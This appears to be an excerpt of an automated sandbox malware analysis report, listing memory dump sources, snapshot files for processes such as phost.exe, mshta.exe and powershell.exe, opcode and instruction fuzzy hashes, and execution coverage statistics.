                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3962158096
                                                                                                                                                                                                                              • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                              • Instruction ID: 6092133590d028b7397a533541ae74e3ffc510a30d331cd87eafde9870ce62ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29416D32B08A5285EF1A9F29DC444BA23B4EB457E4B554135E94EC3B85DE3DE482C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                                              • Instruction ID: 9d2c86d8cd478c54ee3e874a0b3b69098077f951905a6eb395963df330aed0fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a9b1d6d16ab1fe6c903793d19c8bb2ed63e5c59599aead2cadc4c72b8df4769
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94214872B0868182FF218B19D81463E33B1FB84B94F918235C68C83288DF7DE545C742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: c61f3df4c510bdd12ff0e8001e60e0a1449cac8e2fbe8132dc8b29c4fa9e55af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92112E32618B8182EB618F19F94026977F4FB88B98F588230DA8D4B755DF3DD5558B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2181222788.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181192674.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181263670.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181329747.00007FF62CCB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: c9f46e3962f408f0fb48dcd015578d8f863998336716b95769d9c5b2823da4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71017C22B1824386FF21AF68986627E67B0EF48778F80413AD54DC6691DE3CE504DA56
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000003.1750099323.00000209ABCB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000209ABCB0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_3_209abcb0000_mshta.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction ID: ced73fdcfaad286b6318cbdea608af9686425220c1b85d832fd56503da5f28f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA9004047D551F75D41411D50C5DF5C517073CC170FD4C5C04457D0147D44D43D75153
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: iR_L
                                                                                                                                                                                                                              • API String ID: 0-1243337067
                                                                                                                                                                                                                              • Opcode ID: b1aefb1552c0dae6aabad975546d9a58b0f591f318723bc2629ffc422ef22ad5
                                                                                                                                                                                                                              • Instruction ID: be47889c21f230b3bd67dbab338e7b51be0e22f86a6f7c39e0f0b083854a3c20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1aefb1552c0dae6aabad975546d9a58b0f591f318723bc2629ffc422ef22ad5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0751463260DB894FE759DF28C8A58647BE1FF56318B1800BED4CAC71A7E919A807C742
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3d1e7d8430679f3eb70157400454396753b0ef7f9c4fb9f713c2d28f4a329962
                                                                                                                                                                                                                              • Instruction ID: 4238ff2f2e86a6a0580251a2ca6d673d3fbff955056a34d6da511c790d93fd21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d1e7d8430679f3eb70157400454396753b0ef7f9c4fb9f713c2d28f4a329962
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50825822B0EBC90FF766AB6858255B57FE1EF9A214B5801FBD089C71D3E9186C078353
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2f4777f422e77ef4fb9a7bb8236b10a6b72b0eba5655a3cd291d222910bd7dbb
                                                                                                                                                                                                                              • Instruction ID: 4314d03cfe38f4d1068f395c7e7ac980f01b14c414c15c032a0c020cd576788b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f4777f422e77ef4fb9a7bb8236b10a6b72b0eba5655a3cd291d222910bd7dbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7D13B22A0DACB4FFB65EFA848645B57B91EF66318B5801FED05DC70D3E919AC06C342
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 530a0ad2a8b6960f29f60117b27c01e82209e6622fc8c0d887166e41ace8f62a
                                                                                                                                                                                                                              • Instruction ID: 3aed97073ce0dbadffada5973a48f751f0d0d971a23cd7c4d61886fb35d959f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 530a0ad2a8b6960f29f60117b27c01e82209e6622fc8c0d887166e41ace8f62a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33B13371B1CB484FE759DF18C895AB5BBE0FF95310F14017ED08AC32A6DA25A846CB42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dfafa6b1d014dc1e1cd631303064e13b9ebd4061e2eb6ea1de4978c28c4f1bae
                                                                                                                                                                                                                              • Instruction ID: 2894222eb5659c05e88333c6006d91ac7d03c5b0945cdb0d7cfd2399ed9fe8c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfafa6b1d014dc1e1cd631303064e13b9ebd4061e2eb6ea1de4978c28c4f1bae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41FAA3B0E9DA4BE712CF6888A60D43BA0FF21118B4841F6C4DD8A0D7FD19241AC653
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5a5dc842ba9796f0abfe717635209f3b0bf18c91340aa70f0c6dcb3e5063f0f6
                                                                                                                                                                                                                              • Instruction ID: c6e67d33893079db4d980f321ac252a27810119ad8585e81e8b7ccca32078dfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a5dc842ba9796f0abfe717635209f3b0bf18c91340aa70f0c6dcb3e5063f0f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D412671A0CB8C4FDB189F5C9C466E97BE1FBA9311F04426FE45993292CA21A815CBC3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1818283992.00007FFD990DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD990DD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd990dd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 738cb5dde214f442d8b6ee4226b23663e327ca49a86fe749230b19a4ae7085fa
                                                                                                                                                                                                                              • Instruction ID: 8d30902c9c3e0e70108b82b6fed905ce3b08c58fb41563a67a05411648e94bb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 738cb5dde214f442d8b6ee4226b23663e327ca49a86fe749230b19a4ae7085fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66412A7180DBC44FE7568B299855A523FF0EF52364F1606DFE088CB1A3D625E846C7A3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: aac8790259c33471d7ae427f557a3dd4b1a6f71873ad109b2bddf61f1041d686
                                                                                                                                                                                                                              • Instruction ID: fec433d3d312c6f6b87bf15fcf1219f78aac5c76311dcb6beb2c0d265616f9c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aac8790259c33471d7ae427f557a3dd4b1a6f71873ad109b2bddf61f1041d686
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB21D122B0DA870FF7B9EE58446157567C2EF892187A901FAD04DC3192EE18EC068347
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1832061601.00007FFD992C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD992C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd992c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1052af91f4eef3c85fb0cd3ebcb8dceca28f29b70dc249746e2c8f6d6b0db094
                                                                                                                                                                                                                              • Instruction ID: 20040d74224cff1f208b9058c26c8278f5161661e46c9616db430fef0dd04eaa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1052af91f4eef3c85fb0cd3ebcb8dceca28f29b70dc249746e2c8f6d6b0db094
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C11E032F0E9850FF7B5EB5894709B57BD1EF1936879900FAE04DC70D6E919AC068342
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction ID: 77a2e40f241ed5ce18c879ae7199efbf6c099377721301f2fab5458e7fed0d0c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D301677121CB0D4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695DA36E882CB46
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d537df1568fed4409c1ddc2339831d43ce3dd352a933c1c8761f461746355e01
                                                                                                                                                                                                                              • Instruction ID: 863822203987841c53a87619bbf4fbc66942149828d639818ac62509290ac316
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d537df1568fed4409c1ddc2339831d43ce3dd352a933c1c8761f461746355e01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E0722030C68A0FC3108268B020BFA7A81EF88300F00083DF4CE833CBCA8C68828353
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                              • API String ID: 0-2396788759
                                                                                                                                                                                                                              • Opcode ID: 43705adb00ec8032a7c6d53b8ad74c5d9408b2f00d4b4dc98c9de779d15080d1
                                                                                                                                                                                                                              • Instruction ID: 4548f9abefe058aa5befae9679930145c0e9ee000e5b8a8de3b20a2015a6a278
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43705adb00ec8032a7c6d53b8ad74c5d9408b2f00d4b4dc98c9de779d15080d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E13176E3F0EAC64FF397497D597609A3BE0FE6225874A01FBC4DA96077F815280B4252
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1826172617.00007FFD991F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD991F0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ffd991f0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                                                                                              • API String ID: 0-1397233021
                                                                                                                                                                                                                              • Opcode ID: 6bac703635d2a7a8bd5df03dbd399d4b7c2b2893d9a4650531fd42a289370d0a
                                                                                                                                                                                                                              • Instruction ID: 31c9314e8f22bccf0844a633ca156cbfd00342d65019bcb85b2c068d6f94578c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bac703635d2a7a8bd5df03dbd399d4b7c2b2893d9a4650531fd42a289370d0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 433187A3F0E6DA4EF3679A7859761953BD0FF2225CB0A02F7C4D9DA097FE24180A4113
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.2040162242.00007FFD9A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffd9a9e0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e4bdbf92d16b94b484d5941e0a3a66394e9be17a80ebd73133070dcca20535c0
                                                                                                                                                                                                                              • Instruction ID: 820de54b01a98104183c8de54369fd37b7c57916b68a3082435ad5fd8d65d85e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4bdbf92d16b94b484d5941e0a3a66394e9be17a80ebd73133070dcca20535c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2226922B0EA895FE76A977858751B57BE0EFA6314B6801FBD08DC70D7DE18AC06C341
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.2039590071.00007FFD9A910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A910000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffd9a910000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 94a58b3d9ec58fc84cca71dd95e39dc8e32fe649018e915d11699667f40e3920
                                                                                                                                                                                                                              • Instruction ID: 55869c0a6d50498bdee63cc3c2c20de71fb9c8b537e8373d7c69a6ac47212a5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94a58b3d9ec58fc84cca71dd95e39dc8e32fe649018e915d11699667f40e3920
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA61D671E086588FDB58DFACD8956ACBBB1FF8A310F1441AED009D7392CA356803CB80
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.2040162242.00007FFD9A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A9E0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffd9a9e0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9b6db899d81e044a72e847eb14405a8279c264ca0a4de8e94f2113044ca7fa56
                                                                                                                                                                                                                              • Instruction ID: 51009734b7788f66e2148a9a5f19cdf0d6f7db62c3dc4ec45ab3f7234b1dc35e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b6db899d81e044a72e847eb14405a8279c264ca0a4de8e94f2113044ca7fa56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA512532A0E6859FE36A9B6848742B47BA1FF92314B6D01FBD04CC71E7EE186D05C342
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000004A.00000002.2039590071.00007FFD9A910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A910000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_74_2_7ffd9a910000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                              • Instruction ID: b8b14bf90c39bee35028d0c53e7a4abc90454fb29aad5f7aff54d9cfc3232422
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0201A73120CB0C8FDB48EF0CE451AA6B3E0FB89324F10056EE58AC3695D632E881CB42

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                              Total number of Nodes:1246
                                                                                                                                                                                                                              Total number of Limit Nodes:40
